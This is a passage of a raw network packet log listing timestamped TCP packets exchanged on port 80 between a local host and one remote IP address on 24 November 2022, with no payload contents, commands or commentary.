Nov 24, 2022 12:19:59.662081003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662092924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662108898 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662137985 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662156105 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662734032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662765980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662796021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662826061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662830114 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662857056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662874937 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662899971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662909985 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.662930965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662960052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.662992001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663003922 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663021088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663038969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663050890 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663079977 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663122892 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663675070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663711071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663739920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663768053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663795948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663832903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663862944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663892031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663914919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663922071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663943052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663952112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.663968086 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.663981915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664016008 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664068937 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664540052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664572001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664602995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664633036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664642096 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664661884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664670944 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664691925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664716959 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664720058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664748907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664777994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664778948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664808035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664839029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664854050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.664868116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.664887905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665429115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665461063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665493011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665520906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665539026 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665554047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665574074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665585041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665613890 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665643930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665652990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665672064 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665694952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665702105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665730953 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.665733099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665767908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.665791988 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.666383982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.666400909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.666423082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.666455030 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.666851044 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680218935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680272102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680308104 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680341005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680366993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680375099 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680396080 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680413961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680423021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680428982 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680449009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680464983 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680474997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680500984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680526018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680546045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680552959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680571079 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680588961 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680614948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680634022 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680639029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680665016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680689096 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680690050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680717945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680742025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680756092 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680767059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680782080 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.680792093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680815935 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680840015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.680840015 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681133032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681173086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681200981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681210041 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681227922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681235075 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681255102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681282043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681308031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681332111 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681334019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681345940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681359053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681385994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681411028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681421995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681437016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681444883 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681463957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681489944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681514978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681531906 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681540966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681545973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681566954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681592941 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681617022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.681623936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.681637049 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682132959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682162046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682188988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682214975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682239056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682240009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682267904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682291985 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682292938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682306051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682322025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682348967 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682374954 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682375908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682399988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682415962 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682425976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682442904 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682451963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682477951 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682491064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682503939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682528973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682554007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682570934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682579994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.682595968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.682605982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683022976 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683051109 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683077097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683089018 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683105946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683113098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683134079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683161974 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683183908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683188915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683207989 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683216095 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683242083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683265924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683284998 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683291912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683307886 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683629036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683656931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683682919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683707952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683727026 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683733940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683747053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683760881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683785915 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683798075 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683815002 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683840990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683856010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683866978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683892012 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683895111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683922052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683939934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683947086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683973074 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.683989048 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.683998108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684024096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684047937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684065104 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684072018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684087038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684098005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684139967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684619904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684648037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684673071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684698105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684724092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684743881 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684753895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684762955 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684781075 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684804916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684807062 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684830904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684855938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684871912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684881926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684894085 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684907913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684933901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684952021 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.684959888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.684984922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685010910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685020924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685039043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685058117 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685065031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685091972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685106993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685504913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685529947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685560942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685578108 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685590982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685600996 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685627937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685663939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685677052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685702085 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685736895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685750961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685770988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685801983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685826063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685849905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685853004 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685875893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685882092 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685902119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685926914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685930014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.685951948 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685976028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.685997963 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686001062 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686017036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686026096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686050892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686094046 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686448097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686477900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686510086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686531067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686534882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686563015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686564922 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686589956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686614990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686639071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686640978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686669111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686683893 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686703920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686718941 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686736107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686762094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686794996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686809063 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686830997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686860085 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686893940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686907053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686908960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686933041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686958075 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.686980009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.686995983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687030077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687060118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.687063932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687197924 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.687378883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687459946 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687488079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687511921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687536955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687541008 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.687556028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.687562943 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687597036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687601089 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.687627077 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687654018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.687665939 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700257063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700300932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700326920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700355053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700383902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700392008 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700411081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700433016 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700438023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700445890 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700464010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700475931 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700489998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700514078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700539112 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700563908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700565100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700586081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700592995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700620890 CET	80	49708	66.235.200.147	192.168.2.3
